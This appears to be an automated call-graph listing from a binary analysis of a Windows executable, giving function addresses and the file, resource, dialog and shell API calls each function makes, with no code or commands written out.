API calls BuildCatchObjectHelperInternal 26234->26241 26236 7ff693e6832b 26239 7ff693e681d4 BuildCatchObjectHelperInternal 26237->26239 26240 7ff693e658a4 33 API calls 2 library calls 26237->26240 26239->26191 26240->26239 26241->26236 26243 7ff693e66a4b 26242->26243 26262 7ff693e66a44 26242->26262 26245 7ff693e5129c 33 API calls 26243->26245 26244 7ff693e82320 _handle_error 8 API calls 26246 7ff693e6331f 26244->26246 26247 7ff693e66a76 26245->26247 26246->26200 26246->26201 26248 7ff693e66cc7 26247->26248 26249 7ff693e66a96 26247->26249 26250 7ff693e662dc 35 API calls 26248->26250 26251 7ff693e66ab0 26249->26251 26274 7ff693e66b49 26249->26274 26255 7ff693e66ce6 26250->26255 26252 7ff693e670ab 26251->26252 26315 7ff693e5c098 33 API calls 2 library calls 26251->26315 26327 7ff693e52004 33 API calls std::_Xinvalid_argument 26252->26327 26254 7ff693e66eef 26258 7ff693e670cf 26254->26258 26324 7ff693e5c098 33 API calls 2 library calls 26254->26324 26255->26254 26259 7ff693e66d1b 26255->26259 26313 7ff693e66b44 26255->26313 26256 7ff693e670b1 26266 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26256->26266 26330 7ff693e52004 33 API calls std::_Xinvalid_argument 26258->26330 26265 7ff693e670bd 26259->26265 26318 7ff693e5c098 33 API calls 2 library calls 26259->26318 26260 7ff693e670d5 26267 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26260->26267 26262->26244 26263 7ff693e66b03 26275 7ff693e51fa0 31 API calls 26263->26275 26281 7ff693e66b15 BuildCatchObjectHelperInternal 26263->26281 26328 7ff693e52004 33 API calls std::_Xinvalid_argument 26265->26328 26272 7ff693e670b7 26266->26272 26273 7ff693e670db 26267->26273 26268 7ff693e670a6 26279 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26268->26279 26269 7ff693e66f56 26325 7ff693e511cc 33 API calls BuildCatchObjectHelperInternal 26269->26325 26283 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26272->26283 26285 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26273->26285 26280 7ff693e5129c 33 API calls 26274->26280 26274->26313 26275->26281 26277 7ff693e670c3 26288 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26277->26288 26278 7ff693e51fa0 31 API calls 26278->26313 26279->26252 26286 7ff693e66bbe 26280->26286 26281->26278 26282 7ff693e66f69 26326 7ff693e657ac 33 API calls BuildCatchObjectHelperInternal 26282->26326 26283->26265 26284 7ff693e51fa0 31 API calls 26298 7ff693e66df5 26284->26298 26290 7ff693e670e1 26285->26290 26316 7ff693e65820 33 API calls 26286->26316 26292 7ff693e670c9 26288->26292 26289 7ff693e66d76 BuildCatchObjectHelperInternal 26289->26277 26289->26284 26329 7ff693e5704c 47 API calls BuildCatchObjectHelperInternal 26292->26329 26293 7ff693e66bd3 26317 7ff693e5e164 33 API calls 2 library calls 26293->26317 26295 7ff693e51fa0 31 API calls 26297 7ff693e66fec 26295->26297 26300 7ff693e51fa0 31 API calls 26297->26300 26304 7ff693e66e21 26298->26304 26319 7ff693e51744 33 API calls 4 library calls 26298->26319 26299 7ff693e66f79 BuildCatchObjectHelperInternal 26299->26273 26299->26295 26303 7ff693e66ff6 26300->26303 26302 7ff693e51fa0 31 API calls 26306 7ff693e66c6d 26302->26306 26307 7ff693e51fa0 31 API calls 26303->26307 26304->26292 26308 7ff693e5129c 33 API calls 26304->26308 26305 7ff693e66be9 BuildCatchObjectHelperInternal 26305->26272 26305->26302 26310 7ff693e51fa0 31 API calls 26306->26310 26307->26313 26309 7ff693e66ec2 26308->26309 26320 7ff693e52034 26309->26320 26310->26313 26312 7ff693e66edf 26314 7ff693e51fa0 31 API calls 26312->26314 26313->26256 26313->26260 26313->26262 26313->26268 26314->26313 26315->26263 26316->26293 26317->26305 26318->26289 26319->26304 26321 7ff693e52085 26320->26321 26323 7ff693e52059 BuildCatchObjectHelperInternal 26320->26323 26331 7ff693e515b8 33 API calls 3 library calls 26321->26331 26323->26312 26324->26269 26325->26282 26326->26299 26329->26258 26331->26323 26332->26212 26341 7ff693e69638 26334->26341 26338 7ff693e697d9 26339 7ff693e82320 _handle_error 8 API calls 26338->26339 26340 7ff693e697f2 26339->26340 26340->26222 26340->26223 26342 7ff693e69692 26341->26342 26350 7ff693e69730 26341->26350 26346 7ff693e696c0 26342->26346 26355 7ff693e70f68 WideCharToMultiByte 26342->26355 26344 7ff693e82320 _handle_error 8 API calls 26345 7ff693e69764 26344->26345 26345->26338 26351 7ff693e69800 26345->26351 26349 7ff693e696ef 26346->26349 26357 7ff693e6aa88 45 API calls 2 library calls 26346->26357 26358 7ff693e8a270 31 API calls 2 library calls 26349->26358 26350->26344 26352 7ff693e69840 26351->26352 26354 7ff693e69869 26351->26354 26359 7ff693e8a270 31 API calls 2 library calls 26352->26359 26354->26338 26356 7ff693e70faa 26355->26356 26356->26346 26357->26349 26358->26350 26359->26354 26376 7ff693e6d4d0 26360->26376 26364 7ff693e6d8e5 swprintf 26372 7ff693e6d974 26364->26372 26390 7ff693e89ef0 26364->26390 26417 7ff693e59d78 33 API calls 26364->26417 26366 7ff693e6d9a3 26367 7ff693e6da17 26366->26367 26370 7ff693e6da3f 26366->26370 26369 7ff693e82320 _handle_error 8 API calls 26367->26369 26371 7ff693e6da2b 26369->26371 26373 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26370->26373 26371->26068 26372->26366 26418 7ff693e59d78 33 API calls 26372->26418 26374 7ff693e6da44 26373->26374 26377 7ff693e6d665 26376->26377 26379 7ff693e6d502 26376->26379 26380 7ff693e6cb80 26377->26380 26378 7ff693e51744 33 API calls 26378->26379 26379->26377 26379->26378 26382 7ff693e6cbb6 26380->26382 26388 7ff693e6cc80 26380->26388 26384 7ff693e6cc7b 26382->26384 26385 7ff693e6cc20 26382->26385 26387 7ff693e6cbc6 26382->26387 26419 7ff693e51f80 33 API calls 3 library calls 26384->26419 26385->26387 26389 7ff693e821d0 33 API calls 26385->26389 26387->26364 26420 7ff693e52004 33 API calls std::_Xinvalid_argument 26388->26420 26389->26387 26391 7ff693e89f4e 26390->26391 26392 7ff693e89f36 26390->26392 26391->26392 26394 7ff693e89f58 26391->26394 26421 7ff693e8d69c 15 API calls _set_fmode 26392->26421 26423 7ff693e87ef0 35 API calls 2 library calls 26394->26423 26395 7ff693e89f3b 26422 7ff693e878e4 31 API calls _invalid_parameter_noinfo 26395->26422 26398 7ff693e82320 _handle_error 8 API calls 26400 7ff693e8a10b 26398->26400 26399 7ff693e89f69 __scrt_get_show_window_mode 26424 7ff693e87e70 15 API calls _set_fmode 26399->26424 26400->26364 26402 7ff693e89fd4 26425 7ff693e882f8 46 API calls 3 library calls 26402->26425 26404 7ff693e89fdd 26405 7ff693e8a014 26404->26405 26406 7ff693e89fe5 26404->26406 26408 7ff693e8a06c 26405->26408 26409 7ff693e8a092 26405->26409 26410 7ff693e8a023 26405->26410 26411 7ff693e8a01a 26405->26411 26426 7ff693e8d90c 26406->26426 26412 7ff693e8d90c __free_lconv_num 15 API calls 26408->26412 26409->26408 26413 7ff693e8a09c 26409->26413 26414 7ff693e8d90c __free_lconv_num 15 API calls 26410->26414 26411->26408 26411->26410 26416 7ff693e89f46 26412->26416 26415 7ff693e8d90c __free_lconv_num 15 API calls 26413->26415 26414->26416 26415->26416 26416->26398 26417->26364 26418->26366 26419->26388 26421->26395 26422->26416 26423->26399 26424->26402 26425->26404 26427 7ff693e8d911 RtlRestoreThreadPreferredUILanguages 26426->26427 26431 7ff693e8d941 __free_lconv_num 26426->26431 26428 7ff693e8d92c 26427->26428 26427->26431 26432 7ff693e8d69c 15 API calls _set_fmode 26428->26432 26430 7ff693e8d931 GetLastError 26430->26431 26431->26416 26432->26430 26434 7ff693e520f6 26433->26434 26436 7ff693e520cb BuildCatchObjectHelperInternal 26433->26436 26437 7ff693e51474 33 API calls 3 library calls 26434->26437 26436->26080 26437->26436 26439 7ff693e7879b 26438->26439 26440 7ff693e7864f SizeofResource 26438->26440 26439->26124 26440->26439 26441 7ff693e78669 LoadResource 26440->26441 26441->26439 26442 7ff693e78682 LockResource 26441->26442 26442->26439 26443 7ff693e78697 GlobalAlloc 26442->26443 26443->26439 26444 7ff693e786b8 GlobalLock 26443->26444 26445 7ff693e78792 GlobalFree 26444->26445 26446 7ff693e786ca BuildCatchObjectHelperInternal 26444->26446 26445->26439 26447 7ff693e78789 GlobalUnlock 26446->26447 26448 7ff693e786f6 GdipAlloc 26446->26448 26447->26445 26449 7ff693e7870b 26448->26449 26449->26447 26450 7ff693e7875a GdipCreateHBITMAPFromBitmap 26449->26450 26451 7ff693e78772 26449->26451 26450->26451 26451->26447 26453 7ff693e784cc 4 API calls 26452->26453 26454 7ff693e784aa 26453->26454 26456 7ff693e784b9 26454->26456 26463 7ff693e78504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26454->26463 26456->26127 26456->26128 26456->26129 26457->26132 26459 7ff693e784e3 26458->26459 26460 7ff693e784de 26458->26460 26462 7ff693e78df4 16 API calls _handle_error 26459->26462 26464 7ff693e78590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26460->26464 26462->26137 26463->26456 26464->26459 26468 7ff693e698fe _snwprintf 26465->26468 26466 7ff693e69973 26583 7ff693e668b0 48 API calls 26466->26583 26468->26466 26470 7ff693e69a89 26468->26470 26469 7ff693e51fa0 31 API calls 26472 7ff693e699fd 26469->26472 26470->26472 26473 7ff693e520b0 33 API calls 26470->26473 26471 7ff693e6997d BuildCatchObjectHelperInternal 26471->26469 26530 7ff693e6a42e 26471->26530 26534 7ff693e624c0 26472->26534 26473->26472 26474 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26476 7ff693e6a434 26474->26476 26479 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26476->26479 26478 7ff693e69a22 26481 7ff693e6204c 100 API calls 26478->26481 26482 7ff693e6a43a 26479->26482 26480 7ff693e69b17 26552 7ff693e8a450 26480->26552 26484 7ff693e69a2b 26481->26484 26484->26476 26487 7ff693e69a66 26484->26487 26486 7ff693e69aad 26486->26480 26488 7ff693e68e58 33 API calls 26486->26488 26490 7ff693e82320 _handle_error 8 API calls 26487->26490 26488->26486 26489 7ff693e8a450 31 API calls 26502 7ff693e69b57 __vcrt_FlsAlloc 26489->26502 26491 7ff693e6a40e 26490->26491 26491->26140 26492 7ff693e69c89 26493 7ff693e62aa0 101 API calls 26492->26493 26505 7ff693e69d5c 26492->26505 26496 7ff693e69ca1 26493->26496 26497 7ff693e628d0 104 API calls 26496->26497 26496->26505 26503 7ff693e69cc9 26497->26503 26502->26492 26502->26505 26560 7ff693e62bb0 26502->26560 26569 7ff693e628d0 26502->26569 26574 7ff693e62aa0 26502->26574 26503->26505 26526 7ff693e69cd7 __vcrt_FlsAlloc 26503->26526 26584 7ff693e70bbc MultiByteToWideChar 26503->26584 26579 7ff693e6204c 26505->26579 26506 7ff693e6a1ec 26515 7ff693e6a2c2 26506->26515 26590 7ff693e8cf90 31 API calls 2 library calls 26506->26590 26508 7ff693e6a157 26508->26506 26587 7ff693e8cf90 31 API calls 2 library calls 26508->26587 26509 7ff693e6a14b 26509->26140 26512 7ff693e6a249 26591 7ff693e8b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26512->26591 26513 7ff693e6a3a2 26516 7ff693e8a450 31 API calls 26513->26516 26514 7ff693e6a2ae 26514->26515 26592 7ff693e68cd0 33 API calls 2 library calls 26514->26592 26515->26513 26517 7ff693e68e58 33 API calls 26515->26517 26519 7ff693e6a3cb 26516->26519 26517->26515 26521 7ff693e8a450 31 API calls 26519->26521 26520 7ff693e6a16d 26588 7ff693e8b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26520->26588 26521->26505 26523 7ff693e6a1d8 26523->26506 26589 7ff693e68cd0 33 API calls 2 library calls 26523->26589 26524 7ff693e70f68 WideCharToMultiByte 26524->26526 26526->26505 26526->26506 26526->26508 26526->26509 26526->26524 26527 7ff693e6a429 26526->26527 26585 7ff693e6aa88 45 API calls 2 library calls 26526->26585 26586 7ff693e8a270 31 API calls 2 library calls 26526->26586 26593 7ff693e82624 8 API calls 26527->26593 26530->26474 26533 7ff693e6a468 26532->26533 26533->26142 26535 7ff693e624fd CreateFileW 26534->26535 26537 7ff693e625ae GetLastError 26535->26537 26546 7ff693e6266e 26535->26546 26538 7ff693e66a0c 49 API calls 26537->26538 26539 7ff693e625dc 26538->26539 26540 7ff693e625e0 CreateFileW GetLastError 26539->26540 26545 7ff693e6262c 26539->26545 26540->26545 26541 7ff693e626b1 SetFileTime 26544 7ff693e626cf 26541->26544 26542 7ff693e62708 26543 7ff693e82320 _handle_error 8 API calls 26542->26543 26547 7ff693e6271b 26543->26547 26544->26542 26548 7ff693e520b0 33 API calls 26544->26548 26545->26546 26549 7ff693e62736 26545->26549 26546->26541 26546->26544 26547->26478 26547->26486 26548->26542 26550 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26549->26550 26551 7ff693e6273b 26550->26551 26553 7ff693e8a47d 26552->26553 26559 7ff693e8a492 26553->26559 26594 7ff693e8d69c 15 API calls _set_fmode 26553->26594 26555 7ff693e8a487 26595 7ff693e878e4 31 API calls _invalid_parameter_noinfo 26555->26595 26557 7ff693e82320 _handle_error 8 API calls 26558 7ff693e69b37 26557->26558 26558->26489 26559->26557 26561 7ff693e62bcd 26560->26561 26563 7ff693e62be9 26560->26563 26562 7ff693e62bfb 26561->26562 26596 7ff693e5b9c4 99 API calls Concurrency::cancel_current_task 26561->26596 26562->26502 26563->26562 26565 7ff693e62c01 SetFilePointer 26563->26565 26565->26562 26566 7ff693e62c1e GetLastError 26565->26566 26566->26562 26567 7ff693e62c28 26566->26567 26567->26562 26597 7ff693e5b9c4 99 API calls Concurrency::cancel_current_task 26567->26597 26570 7ff693e628f6 26569->26570 26573 7ff693e628fd 26569->26573 26570->26502 26571 7ff693e62320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26571->26573 26573->26570 26573->26571 26598 7ff693e5b8a4 99 API calls Concurrency::cancel_current_task 26573->26598 26599 7ff693e62778 26574->26599 26577 7ff693e62ac7 26577->26502 26580 7ff693e62066 26579->26580 26581 7ff693e62072 26579->26581 26580->26581 26607 7ff693e620d0 26580->26607 26583->26471 26584->26526 26585->26526 26586->26526 26587->26520 26588->26523 26589->26506 26590->26512 26591->26514 26592->26515 26593->26530 26594->26555 26595->26559 26605 7ff693e62789 _snwprintf 26599->26605 26600 7ff693e62890 SetFilePointer 26602 7ff693e628b8 GetLastError 26600->26602 26604 7ff693e627b5 26600->26604 26601 7ff693e82320 _handle_error 8 API calls 26603 7ff693e6281d 26601->26603 26602->26604 26603->26577 26606 7ff693e5b9c4 99 API calls Concurrency::cancel_current_task 26603->26606 26604->26601 26605->26600 26605->26604 26608 7ff693e620ea 26607->26608 26609 7ff693e62102 26607->26609 26608->26609 26611 7ff693e620f6 FindCloseChangeNotification 26608->26611 26610 7ff693e62126 26609->26610 26613 7ff693e5b544 99 API calls 26609->26613 26610->26581 26611->26609 26613->26610 26614->26152 26616->26156 26618 7ff693e8154b 26619 7ff693e814a2 26618->26619 26621 7ff693e81900 26619->26621 26647 7ff693e81558 26621->26647 26624 7ff693e8198b 26625 7ff693e81868 DloadReleaseSectionWriteAccess 6 API calls 26624->26625 26626 7ff693e81998 RaiseException 26625->26626 26640 7ff693e81bb5 26626->26640 26627 7ff693e819b4 26628 7ff693e81a3d LoadLibraryExA 26627->26628 26629 7ff693e81aa9 26627->26629 26631 7ff693e81b85 26627->26631 26636 7ff693e81abd 26627->26636 26628->26629 26630 7ff693e81a54 GetLastError 26628->26630 26634 7ff693e81ab4 FreeLibrary 26629->26634 26629->26636 26632 7ff693e81a69 26630->26632 26633 7ff693e81a7e 26630->26633 26655 7ff693e81868 26631->26655 26632->26629 26632->26633 26638 7ff693e81868 DloadReleaseSectionWriteAccess 6 API calls 26633->26638 26634->26636 26635 7ff693e81b1b GetProcAddress 26635->26631 26639 7ff693e81b30 GetLastError 26635->26639 26636->26631 26636->26635 26641 7ff693e81a8b RaiseException 26638->26641 26642 7ff693e81b45 26639->26642 26640->26619 26641->26640 26642->26631 26643 7ff693e81868 DloadReleaseSectionWriteAccess 6 API calls 26642->26643 26644 7ff693e81b67 RaiseException 26643->26644 26645 7ff693e81558 _com_raise_error 6 API calls 26644->26645 26646 7ff693e81b81 26645->26646 26646->26631 26648 7ff693e8156e 26647->26648 26654 7ff693e815d3 26647->26654 26663 7ff693e81604 26648->26663 26651 7ff693e815ce 26653 7ff693e81604 DloadReleaseSectionWriteAccess 3 API calls 26651->26653 26653->26654 26654->26624 26654->26627 26656 7ff693e81878 26655->26656 26662 7ff693e818d1 26655->26662 26657 7ff693e81604 DloadReleaseSectionWriteAccess 3 API calls 26656->26657 26658 7ff693e8187d 26657->26658 26659 7ff693e818cc 26658->26659 26660 7ff693e817d8 DloadProtectSection 3 API calls 26658->26660 26661 7ff693e81604 DloadReleaseSectionWriteAccess 3 API calls 26659->26661 26660->26659 26661->26662 26662->26640 26664 7ff693e81573 26663->26664 26665 7ff693e8161f 26663->26665 26664->26651 26670 7ff693e817d8 26664->26670 26665->26664 26666 7ff693e81624 GetModuleHandleW 26665->26666 26667 7ff693e8163e GetProcAddress 26666->26667 26669 7ff693e81639 26666->26669 26668 7ff693e81653 GetProcAddress 26667->26668 26667->26669 26668->26669 26669->26664 26673 7ff693e817fa DloadProtectSection 26670->26673 26671 7ff693e81802 26671->26651 26672 7ff693e8183a VirtualProtect 26672->26671 26673->26671 26673->26672 26675 7ff693e816a4 VirtualQuery GetSystemInfo 26673->26675 26675->26672 26676 7ff693e81491 26677 7ff693e813c9 26676->26677 26677->26676 26678 7ff693e81900 _com_raise_error 14 API calls 26677->26678 26678->26677 26679 7ff693e820f0 26680 7ff693e82106 _com_error::_com_error 26679->26680 26685 7ff693e84078 26680->26685 26682 7ff693e82117 26683 7ff693e81900 _com_raise_error 14 API calls 26682->26683 26684 7ff693e82163 26683->26684 26686 7ff693e84097 26685->26686 26687 7ff693e840b4 RtlPcToFileHeader 26685->26687 26686->26687 26688 7ff693e840cc 26687->26688 26689 7ff693e840db RaiseException 26687->26689 26688->26689 26689->26682 26690 7ff693e803e0 26691 7ff693e80497 26690->26691 26692 7ff693e8041f 26690->26692 26693 7ff693e6aae0 48 API calls 26691->26693 26694 7ff693e6aae0 48 API calls 26692->26694 26695 7ff693e804ab 26693->26695 26696 7ff693e80433 26694->26696 26697 7ff693e6da98 48 API calls 26695->26697 26698 7ff693e6da98 48 API calls 26696->26698 26701 7ff693e80442 BuildCatchObjectHelperInternal 26697->26701 26698->26701 26699 7ff693e51fa0 31 API calls 26700 7ff693e80541 26699->26700 26715 7ff693e5250c 26700->26715 26701->26699 26706 7ff693e805cc 26701->26706 26714 7ff693e805c6 26701->26714 26703 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26703->26706 26704 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26707 7ff693e805d2 26704->26707 26706->26704 26714->26703 26716 7ff693e52516 SetDlgItemTextW 26715->26716 26717 7ff693e52513 26715->26717 26717->26716 26718 7ff693e7b190 27061 7ff693e5255c 26718->27061 26720 7ff693e7b1db 26721 7ff693e7be93 26720->26721 26722 7ff693e7b1ef 26720->26722 26872 7ff693e7b20c 26720->26872 27327 7ff693e7f390 26721->27327 26726 7ff693e7b2db 26722->26726 26727 7ff693e7b1ff 26722->26727 26722->26872 26725 7ff693e82320 _handle_error 8 API calls 26730 7ff693e7c350 26725->26730 26733 7ff693e7b391 26726->26733 26738 7ff693e7b2f5 26726->26738 26731 7ff693e7b2a9 26727->26731 26732 7ff693e7b207 26727->26732 26728 7ff693e7beba IsDlgButtonChecked 26729 7ff693e7bec9 26728->26729 26735 7ff693e7bed5 SendDlgItemMessageW 26729->26735 26736 7ff693e7bef0 GetDlgItem IsDlgButtonChecked 26729->26736 26737 7ff693e7b2cb EndDialog 26731->26737 26731->26872 26741 7ff693e6aae0 48 API calls 26732->26741 26732->26872 27069 7ff693e522bc GetDlgItem 26733->27069 26735->26736 26740 7ff693e662dc 35 API calls 26736->26740 26737->26872 26742 7ff693e6aae0 48 API calls 26738->26742 26743 7ff693e7bf47 GetDlgItem 26740->26743 26744 7ff693e7b236 26741->26744 26745 7ff693e7b313 SetDlgItemTextW 26742->26745 27346 7ff693e52520 26743->27346 27350 7ff693e51ec4 34 API calls _handle_error 26744->27350 26746 7ff693e7b326 26745->26746 26755 7ff693e7b340 GetMessageW 26746->26755 26746->26872 26749 7ff693e7b408 GetDlgItem 26750 7ff693e7b422 IsDlgButtonChecked IsDlgButtonChecked 26749->26750 26751 7ff693e7b44f SetFocus 26749->26751 26750->26751 26756 7ff693e7b465 26751->26756 26757 7ff693e7b4f2 26751->26757 26754 7ff693e7b246 26760 7ff693e7b25c 26754->26760 26761 7ff693e5250c SetDlgItemTextW 26754->26761 26763 7ff693e7b35e IsDialogMessageW 26755->26763 26755->26872 26764 7ff693e6aae0 48 API calls 26756->26764 27083 7ff693e58d04 26757->27083 26758 7ff693e7b3da 26766 7ff693e51fa0 31 API calls 26758->26766 26775 7ff693e7c363 26760->26775 26760->26872 26761->26760 26763->26746 26770 7ff693e7b373 TranslateMessage DispatchMessageW 26763->26770 26771 7ff693e7b46f 26764->26771 26765 7ff693e7bcc5 26772 7ff693e6aae0 48 API calls 26765->26772 26766->26872 26769 7ff693e7b52c 27093 7ff693e7ef80 26769->27093 26770->26746 26784 7ff693e5129c 33 API calls 26771->26784 26776 7ff693e7bcd6 SetDlgItemTextW 26772->26776 26780 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26775->26780 26779 7ff693e6aae0 48 API calls 26776->26779 26785 7ff693e7bd08 26779->26785 26786 7ff693e7c368 26780->26786 26783 7ff693e6aae0 48 API calls 26788 7ff693e7b555 26783->26788 26789 7ff693e7b498 26784->26789 26802 7ff693e5129c 33 API calls 26785->26802 26795 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26786->26795 26792 7ff693e6da98 48 API calls 26788->26792 26793 7ff693e7f0a4 24 API calls 26789->26793 26799 7ff693e7b568 26792->26799 26800 7ff693e7b4a5 26793->26800 26803 7ff693e7c36e 26795->26803 27107 7ff693e7f0a4 26799->27107 26800->26786 26816 7ff693e7b4e8 26800->26816 26824 7ff693e7bd31 26802->26824 26807 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26803->26807 26817 7ff693e7c374 26807->26817 26813 7ff693e7bdda 26819 7ff693e6aae0 48 API calls 26813->26819 26815 7ff693e7b5ec 26827 7ff693e7b61a 26815->26827 27352 7ff693e632a8 26815->27352 26816->26815 27351 7ff693e7fa80 33 API calls 2 library calls 26816->27351 26837 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26817->26837 26829 7ff693e7bde4 26819->26829 26822 7ff693e51fa0 31 API calls 26832 7ff693e7b586 26822->26832 26824->26813 26838 7ff693e5129c 33 API calls 26824->26838 27121 7ff693e62f58 26827->27121 26849 7ff693e5129c 33 API calls 26829->26849 26832->26803 26832->26816 26843 7ff693e7c37a 26837->26843 26844 7ff693e7bd7f 26838->26844 26853 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26843->26853 26850 7ff693e6aae0 48 API calls 26844->26850 26847 7ff693e7b64c 27133 7ff693e67fc4 26847->27133 26848 7ff693e7b634 GetLastError 26848->26847 26854 7ff693e7be0d 26849->26854 26856 7ff693e7bd8a 26850->26856 26852 7ff693e7b60e 27355 7ff693e79d90 12 API calls _handle_error 26852->27355 26860 7ff693e7c380 26853->26860 26870 7ff693e5129c 33 API calls 26854->26870 26862 7ff693e51150 33 API calls 26856->26862 26869 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26860->26869 26865 7ff693e7bda2 26862->26865 26864 7ff693e7b65e 26867 7ff693e7b665 GetLastError 26864->26867 26868 7ff693e7b674 26864->26868 26876 7ff693e52034 33 API calls 26865->26876 26867->26868 26875 7ff693e7b72b 26868->26875 26877 7ff693e7b68b GetTickCount 26868->26877 26963 7ff693e7b71c 26868->26963 26873 7ff693e7c386 26869->26873 26874 7ff693e7be4e 26870->26874 26872->26725 26878 7ff693e5255c 61 API calls 26873->26878 26890 7ff693e51fa0 31 API calls 26874->26890 26879 7ff693e7ba50 26875->26879 26884 7ff693e66454 34 API calls 26875->26884 26880 7ff693e7bdbe 26876->26880 27136 7ff693e54228 26877->27136 26882 7ff693e7c3e4 26878->26882 26887 7ff693e7b3b1 EndDialog 26879->26887 27364 7ff693e5bd0c 33 API calls 26879->27364 26885 7ff693e51fa0 31 API calls 26880->26885 26889 7ff693e7c3e8 26882->26889 26898 7ff693e7c489 GetDlgItem SetFocus 26882->26898 26940 7ff693e7c3fd 26882->26940 26892 7ff693e7b74e 26884->26892 26893 7ff693e7bdcc 26885->26893 26887->26758 26899 7ff693e82320 _handle_error 8 API calls 26889->26899 26897 7ff693e7be78 26890->26897 27356 7ff693e6b914 102 API calls 26892->27356 26902 7ff693e51fa0 31 API calls 26893->26902 26895 7ff693e7bb79 26912 7ff693e6aae0 48 API calls 26895->26912 26896 7ff693e7ba75 27365 7ff693e51150 26896->27365 26906 7ff693e51fa0 31 API calls 26897->26906 26903 7ff693e7c4ba 26898->26903 26909 7ff693e7ca97 26899->26909 26902->26813 26918 7ff693e5129c 33 API calls 26903->26918 26904 7ff693e7b6ba 26911 7ff693e51fa0 31 API calls 26904->26911 26908 7ff693e7be83 26906->26908 26907 7ff693e7ba8a 26914 7ff693e6aae0 48 API calls 26907->26914 26915 7ff693e51fa0 31 API calls 26908->26915 26910 7ff693e7b768 26917 7ff693e6da98 48 API calls 26910->26917 26919 7ff693e7b6c8 26911->26919 26913 7ff693e7bba7 SetDlgItemTextW 26912->26913 26920 7ff693e52534 26913->26920 26921 7ff693e7ba97 26914->26921 26915->26758 26916 7ff693e7c434 SendDlgItemMessageW 26922 7ff693e7c45d EndDialog 26916->26922 26923 7ff693e7c454 26916->26923 26924 7ff693e7b7aa GetCommandLineW 26917->26924 26925 7ff693e7c4cc 26918->26925 27146 7ff693e62134 26919->27146 26926 7ff693e7bbc5 SetDlgItemTextW GetDlgItem 26920->26926 26927 7ff693e51150 33 API calls 26921->26927 26922->26889 26923->26922 26928 7ff693e7b869 26924->26928 26929 7ff693e7b84f 26924->26929 27369 7ff693e680d8 33 API calls 26925->27369 26932 7ff693e7bc13 26926->26932 26933 7ff693e7bbf0 GetWindowLongPtrW SetWindowLongPtrW 26926->26933 26934 7ff693e7baaa 26927->26934 27357 7ff693e7ab54 33 API calls _handle_error 26928->27357 26947 7ff693e520b0 33 API calls 26929->26947 27162 7ff693e7ce88 26932->27162 26933->26932 26939 7ff693e51fa0 31 API calls 26934->26939 26935 7ff693e7c4e0 26941 7ff693e5250c SetDlgItemTextW 26935->26941 26946 7ff693e7bab5 26939->26946 26940->26889 26940->26916 26948 7ff693e7c4f4 26941->26948 26942 7ff693e7b87a 27358 7ff693e7ab54 33 API calls _handle_error 26942->27358 26943 7ff693e7b6f5 GetLastError 26944 7ff693e7b704 26943->26944 26950 7ff693e6204c 100 API calls 26944->26950 26952 7ff693e51fa0 31 API calls 26946->26952 26947->26928 26956 7ff693e7c526 SendDlgItemMessageW FindFirstFileW 26948->26956 26954 7ff693e7b711 26950->26954 26951 7ff693e7ce88 160 API calls 26955 7ff693e7bc3c 26951->26955 26960 7ff693e7bac3 26952->26960 26953 7ff693e7b88b 27359 7ff693e7ab54 33 API calls _handle_error 26953->27359 26958 7ff693e51fa0 31 API calls 26954->26958 27312 7ff693e7f974 26955->27312 26961 7ff693e7c57b 26956->26961 27054 7ff693e7ca04 26956->27054 26958->26963 26968 7ff693e6aae0 48 API calls 26960->26968 26972 7ff693e6aae0 48 API calls 26961->26972 26962 7ff693e7b89c 27360 7ff693e6b9b4 102 API calls 26962->27360 26963->26875 26963->26895 26966 7ff693e7ca81 26966->26889 26967 7ff693e7ce88 160 API calls 26983 7ff693e7bc6a 26967->26983 26971 7ff693e7badb 26968->26971 26969 7ff693e7b8b3 27361 7ff693e7fbdc 33 API calls 26969->27361 26970 7ff693e7caa9 26975 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26970->26975 26984 7ff693e5129c 33 API calls 26971->26984 26977 7ff693e7c59e 26972->26977 26974 7ff693e7b8d2 CreateFileMappingW 26978 7ff693e7b953 ShellExecuteExW 26974->26978 26979 7ff693e7b911 MapViewOfFile 26974->26979 26980 7ff693e7caae 26975->26980 26976 7ff693e7bc96 27326 7ff693e52298 GetDlgItem EnableWindow 26976->27326 26986 7ff693e5129c 33 API calls 26977->26986 27001 7ff693e7b974 26978->27001 27362 7ff693e83640 26979->27362 26987 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26980->26987 26983->26976 26988 7ff693e7ce88 160 API calls 26983->26988 26995 7ff693e7bb04 26984->26995 26985 7ff693e7b3f5 26985->26765 26985->26887 26989 7ff693e7c5cd 26986->26989 26990 7ff693e7cab4 26987->26990 26988->26976 26991 7ff693e51150 33 API calls 26989->26991 26994 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26990->26994 26992 7ff693e7c5e8 26991->26992 27370 7ff693e5e164 33 API calls 2 library calls 26992->27370 26993 7ff693e7b9c3 27002 7ff693e7b9dc UnmapViewOfFile CloseHandle 26993->27002 27003 7ff693e7b9ef 26993->27003 26998 7ff693e7caba 26994->26998 26995->26843 26996 7ff693e7bb5a 26995->26996 26999 7ff693e51fa0 31 API calls 26996->26999 